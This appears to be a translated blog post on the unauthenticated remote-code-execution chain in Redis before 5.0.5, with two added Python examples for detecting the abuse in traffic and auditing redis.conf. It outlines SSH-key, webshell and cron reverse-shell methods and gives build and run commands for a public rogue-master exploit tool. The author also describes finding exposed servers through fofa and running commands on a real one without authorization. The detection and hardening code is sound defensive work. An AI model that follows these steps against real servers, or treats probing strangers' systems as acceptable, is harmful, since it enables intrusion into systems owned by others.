Unauthorized access to RCE before Redis 4.x/5.0.5
Regarding the Redis unauthorized access vulnerability, there are already plenty of write-ups on the Internet. The default port is 6379. Unauthorized instances generally have no password set, and some have a weak password. There are basically three ways to exploit unauthorized access~~
The first: SSH password-free login
- The SSH service needs to be running
- /root/.ssh, or another user's .ssh directory, needs to be writable
The second: write a webshell directly
- A web service needs to be running
- The absolute path of the website must be known
- Redis needs permission to write files there
The third: cron job reverse shell
- Requires root privileges
- The cron directory must be known, such as /var/spool/cron
I did a search on fofa, and there really are many unauthorized Redis instances:
Connect directly with redis-cli -h xxxx and run info:
It is a real environment, so I just connected and had a look...
Back to the topic: the principle of unauthorized access to RCE before Redis 4.x/5.0.5. In Redis versions before 4.x/5.0.5, an unauthenticated client can switch the instance into master/slave mode, make it load a remote module as a dynamic link library, and then execute arbitrary commands.
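Both the three classic methods and the master/slave module-load chain are visible on the wire as a handful of Redis commands, which makes them easy to spot in captured traffic. The following is an added defensive example (not part of this post, and not code from the vulhub project): a small RESP parser that reads a captured client-to-server byte stream and flags CONFIG SET (the file-write primitive behind the SSH key, webshell and cron methods) and SLAVEOF/REPLICAOF plus MODULE LOAD (the rogue-master chain). The sample capture is constructed; 198.51.100.7 is a documentation address, and the file names in it are placeholders.

```python
"""Flag Redis commands used by the unauthorized-access-to-RCE paths in a
captured client-to-server RESP stream. Added defensive example; the sample
traffic below is constructed, not taken from the post."""
from typing import Iterator, List, Tuple

# Command prefixes whose appearance in an unauthenticated session indicates one
# of the abuse paths: CONFIG SET (dir/dbfilename file-write primitive behind the
# SSH-key, webshell and cron methods) or the rogue-master module-load chain.
WATCHED = {
    ("CONFIG", "SET"): "persistence settings changed (file-write primitive)",
    ("SLAVEOF",): "instance pointed at an external master (rogue-master chain)",
    ("REPLICAOF",): "instance pointed at an external master (rogue-master chain)",
    ("MODULE", "LOAD"): "shared library loaded into redis-server",
}


def parse_resp(stream: bytes) -> Iterator[List[str]]:
    """Yield each client command as a list of argument strings.

    Handles RESP arrays of bulk strings (what redis-cli sends) and the
    inline format 'CMD arg arg'. Stops at a truncated or malformed array."""
    pos = 0
    while pos < len(stream):
        end = stream.find(b"\r\n", pos)
        if end == -1:
            break
        line = stream[pos:end]
        pos = end + 2
        if not line:
            continue
        if line[:1] != b"*":
            # Inline command: plain words separated by spaces.
            yield line.decode("utf-8", "replace").split()
            continue
        args: List[str] = []
        for _ in range(int(line[1:])):
            hdr_end = stream.find(b"\r\n", pos)
            if hdr_end == -1 or stream[pos:pos + 1] != b"$":
                return
            length = int(stream[pos + 1:hdr_end])
            if length < 0:              # $-1 is a null bulk string
                args.append("")
                pos = hdr_end + 2
                continue
            start = hdr_end + 2
            args.append(stream[start:start + length].decode("utf-8", "replace"))
            pos = start + length + 2    # skip payload and its trailing CRLF
        yield args


def flag_commands(stream: bytes) -> List[Tuple[str, str]]:
    """Return (command line, reason) for every watched command in the stream."""
    findings = []
    for args in parse_resp(stream):
        head = tuple(a.upper() for a in args[:2])
        for prefix, reason in WATCHED.items():
            if head[:len(prefix)] == prefix:
                findings.append((" ".join(args), reason))
                break
    return findings


# Constructed capture: an INFO probe, the watched commands, then a benign GET.
SAMPLE_CAPTURE = (
    b"*1\r\n$4\r\nINFO\r\n"
    b"*4\r\n$6\r\nCONFIG\r\n$3\r\nSET\r\n$3\r\ndir\r\n$6\r\n/tmp/x\r\n"
    b"*3\r\n$7\r\nSLAVEOF\r\n$12\r\n198.51.100.7\r\n$4\r\n8888\r\n"
    b"*3\r\n$6\r\nMODULE\r\n$4\r\nLOAD\r\n$11\r\n./module.so\r\n"
    b"GET mykey\r\n"
)

if __name__ == "__main__":
    for cmd, reason in flag_commands(SAMPLE_CAPTURE):
        print(f"{cmd!r}: {reason}")
```

In practice you would feed it the reassembled client side of a TCP stream from a capture on port 6379; any of these commands arriving from a source that never sent AUTH is a strong signal on its own, and MODULE LOAD or SLAVEOF pointing at an address outside your replication topology should page someone.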
Use script: https://github.com/vulhub/redis-rogue-getshell
Before using it, compile it to produce exp.so:
cd RedisModulesSDK/
make
Then run the script:
python3 redis-master.py -r target-ip -p 6379 -L local-ip -P 8888 -f RedisModulesSDK/exp.so -c "whoami"
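The Redis versions this chain applies to have no ACLs (those arrived in 6.0), so the configuration-level counter-measures are bind, protected-mode, a strong requirepass, and rename-command for the commands the chain needs. The following is an added example that is not from this post or any Redis project code: it audits a redis.conf text for those settings. The directive names are real redis.conf directives; the two configs are constructed samples and the password value is a placeholder.

```python
"""Audit a redis.conf for the settings that close off the unauthenticated
access paths discussed above. Added defensive example with constructed sample
configs; the directive names are real redis.conf directives."""
from typing import Dict, List

# Commands that the three classic methods and the rogue-master chain rely on.
SENSITIVE_COMMANDS = ("CONFIG", "SLAVEOF", "REPLICAOF", "MODULE", "DEBUG")


def parse_conf(text: str) -> Dict[str, List[List[str]]]:
    """Map each directive to every argument list given for it (rename-command
    may appear many times). Comments and blank lines are skipped."""
    directives: Dict[str, List[List[str]]] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        directives.setdefault(parts[0].lower(), []).append(parts[1:])
    return directives


def audit(text: str) -> List[str]:
    """Return a list of findings; an empty list means every check passed."""
    d = parse_conf(text)
    findings: List[str] = []

    # Without a bind directive Redis listens on every interface.
    binds = d.get("bind", [])
    if not binds or any("0.0.0.0" in args or "*" in args for args in binds):
        findings.append("bind: listens on all interfaces; bind to loopback or an internal address")

    # protected-mode defaults to yes; an explicit 'no' removes the last guard
    # for a password-less instance reachable from the network.
    mode = [a.lower() for a in d.get("protected-mode", [["yes"]])[-1]]
    if mode[:1] != ["yes"]:
        findings.append("protected-mode: disabled; keep it 'yes'")

    pw = d.get("requirepass", [[]])[-1]
    secret = pw[0].strip('"') if pw else ""
    if not secret:
        findings.append("requirepass: unset; unauthenticated clients get full access")
    elif len(secret) < 16:
        findings.append("requirepass: short password; Redis allows very fast online guessing")

    # rename-command <CMD> "" disables the command entirely.
    renamed = {args[0].upper() for args in d.get("rename-command", [])
               if len(args) >= 2 and args[1] in ('""', "''")}
    for cmd in SENSITIVE_COMMANDS:
        if cmd not in renamed:
            findings.append(f'rename-command: {cmd} still reachable; disable it with rename-command {cmd} ""')
    return findings


# Constructed sample: roughly what an exposed default install looks like.
WEAK_CONF = """
bind 0.0.0.0
port 6379
protected-mode no
dir /var/lib/redis
"""

# Constructed sample: the same instance after hardening (password is a placeholder).
HARDENED_CONF = """
bind 127.0.0.1
port 6379
protected-mode yes
requirepass "REPLACE-WITH-A-LONG-RANDOM-SECRET"
rename-command CONFIG ""
rename-command SLAVEOF ""
rename-command REPLICAOF ""
rename-command MODULE ""
rename-command DEBUG ""
"""

if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"{name}: {audit(conf) or ['ok']}")
```

Disabling CONFIG breaks tools that manage the instance through CONFIG SET, so some deployments rename it to an unguessable string instead of the empty string; the check above only accepts a full disable. On Redis 6 the same effect is achieved with ACL rules, and on 7.0 and later MODULE LOAD is additionally refused unless enable-module-command is set to yes.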
Here I used fofa to find an instance with a matching version (a matching version does not guarantee the command will execute), version 4.0.11:
Run the script and the output of the command is returned:
It is a real environment, so I stop here~~
If anything in this description is wrong, feel free to point it out~~